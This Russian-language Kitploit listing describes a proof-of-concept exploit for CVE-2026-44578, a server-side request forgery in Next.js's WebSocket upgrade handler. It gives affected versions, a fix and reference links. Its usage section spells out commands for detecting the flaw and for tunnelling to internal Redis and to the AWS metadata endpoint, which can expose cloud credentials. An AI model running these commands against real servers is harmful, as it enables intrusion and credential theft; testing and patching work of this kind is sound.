Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-44578-PoC — Эксплойт-концепция для CVE-2026-44578, подделка запросов на стороне сервера (SSRF) в обработчике обновления WebSocket в Next.js. Включает режим обнаружения и туннелирование к внутренним сервисам, таким как Redis или конечные точки метаданных облака. | Kitploit
Инструменты/GitHubGitHub/tocong282/cve-2026-44578-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеБезопасность облачных сред
GitHubtocong282/cve-2026-44578-poc

CVE-2026-44578-PoC

Эксплойт-концепция для CVE-2026-44578, подделка запросов на стороне сервера (SSRF) в обработчике обновления WebSocket в Next.js. Включает режим обнаружения и туннелирование к внутренним сервисам, таким как Redis или конечные точки метаданных облака.

Репозиторий
353 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-44578 - PoC SSRF через WebSocket в Next.js

Уязвимость: Server-Side Request Forgery (SSRF) в обработчике обновления WebSocket Next.js (13.4.13 → 15.5.15, 16.0.0 → 16.1.6)

Использование

root@kitploit:~
# Обнаружение уязвимости
python3 poc.py target.com:3000 --detect

# Туннель к внутреннему Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"

# Туннель к метаданным AWS
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"

Исправление

Обновитесь до Next.js 15.5.16 или 16.2.5

Ссылки

  • https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
  • GHSA-c4j6-fc7j-m34r
Скачать инструмент